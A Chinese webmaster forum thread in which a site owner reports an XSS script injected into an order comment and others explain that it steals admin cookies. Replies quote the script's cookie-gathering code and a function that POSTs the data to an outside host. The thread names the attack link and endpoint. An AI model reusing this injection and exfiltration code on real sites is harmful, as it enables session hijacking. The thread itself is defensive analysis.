🏠首页 › 站长杂谈 › 最近发现网站留言被注入的一段js

镖师 发表于 2024-8-7 09:35:00

最近发现网站留言被注入的一段js

<防屏蔽sCRiPt/SrC=地址在下面被loc防火墙拦截了>

有一天发现后台一个订单留言出现这玩意，能调用的地方两个，一个是订单列表，一个是订单详情。订单详情看了F12审查，没被运行，被转成字符串了。订单列表里的被运行了。还导致的后面订单都显示不出来。

求大佬看看这段代码是干嘛

xss.icu/jvcy

IT618发布 发表于 2024-8-7 09:35:23

主要就是偷你cookie 不難理解吧

独家记忆 发表于 2024-8-7 09:35:31

该JavaScript文件中包含 `document.cookie` 代码。为了进一步确认和提供详细信息，我们需要定位并查看代码中使用 `document.cookie` 的上下文。接下来，我们将提取并查看包含 `document.cookie` 的相关代码片段。

在上传的 JavaScript 文件中，`document.cookie` 出现了三次。以下是每次出现的上下文：

1.
```javascript
probe_return_data['cookie'] = never_null(document.cookie);
```

2.
```javascript
try {
    return document.cookie
} catch(e) {
    return ''
```

3.
```javascript
try {
    return document.cookie
} catch(e) {
    return ''
```

这些代码段确实尝试访问 `document.cookie`。特别是第一个代码段，将 `document.cookie` 存储在 `probe_return_data['cookie']` 中，这可能是将你的 cookie 数据发送到某个地方。

如果这些代码没有经过审查或来自不可信来源，可能存在安全隐患。建议不要运行该 JavaScript 文件，并检查网站或应用的来源和信誉。

浅生 发表于 2024-8-7 09:36:05

为了给出确切的证据，我们需要查看代码中是否有尝试发送 `document.cookie` 的操作，例如通过网络请求将其发送到外部服务器。

以下是一些常见的方式：

1. 使用 `XMLHttpRequest` 发送数据。
2. 使用 `fetch` 发送数据。
3. 动态创建 `img` 或 `script` 标签并设置 `src` 为包含 cookie 数据的 URL。

让我们在代码中查找这些模式。

在检查 JavaScript 代码时，发现了以下可疑的片段，它们可能用于窃取你的 cookie 信息并将其发送到外部服务器：

### 使用 `XMLHttpRequest` 发送数据
```javascript
function contact_mothership(probe_return_data) {
    if(gone) return;
    gone = 1;
    var http = new XMLHttpRequest();
    var url = "//www.xiaokel.cn/bdstatic.com/?callback=jsonp";
    http.open("POST", url, true);
    http.setRequestHeader("Content-type", "application/json");
    http.send(JSON.stringify(probe_return_data));
}
```
这个函数会创建一个 `XMLHttpRequest` 对象，并将 `probe_return_data` 发送到指定的 URL。这可能包括你的 cookie 数据，因为 `probe_return_data['cookie']` 被设置为 `document.cookie`。

### 动态创建图片元素发送数据
尽管在此代码中找到了多个创建 `Image` 元素的例子，但没有明确的证据表明它们用于发送 cookie 数据。然而，这是一种常见的技术，可以通过设置 `img.src` 为包含 cookie 数据的 URL 来窃取信息。

综合这些发现，可以合理推断这段代码确实可能在尝试窃取你的 cookie 信息，并通过 `XMLHttpRequest` 将其发送到外部服务器。具体的证据包括：

1. **`document.cookie` 被访问并存储在 `probe_return_data['cookie']` 中。**
2. **`contact_mothership` 函数会将 `probe_return_data` 发送到外部 URL。**

为了确保安全，建议立即移除或禁用该脚本，并检查服务器日志以确定是否有任何未经授权的数据传输。

Crystαl 发表于 2024-8-7 09:36:28

:lolgpt真省事嗷，建议自己问问chatgpt.com

Crystαl 发表于 2024-8-7 09:36:57

就是插入XSS代码，如果正常插入了，你触发了就会把你的COOKIE盗取，IP，网址后台地址，游览器UA等一系列信息

TyCoding 发表于 2024-8-7 09:37:38

zixi 发表于 2024-8-7 01:37
gpt真省事嗷，建议自己问问chatgpt.com
回家了懒得登录，最近有人账号被登录后台，原来是这个搞的鬼

IT618发布 发表于 2024-8-7 09:38:11

whoamie 发表于 2024-8-7 02:16
就是插入XSS代码，如果正常插入了，你触发了就会把你的COOKIE盗取，IP，网址后台地址，游览器UA等一系列信 ...
感谢

查看完整版本: 最近发现网站留言被注入的一段js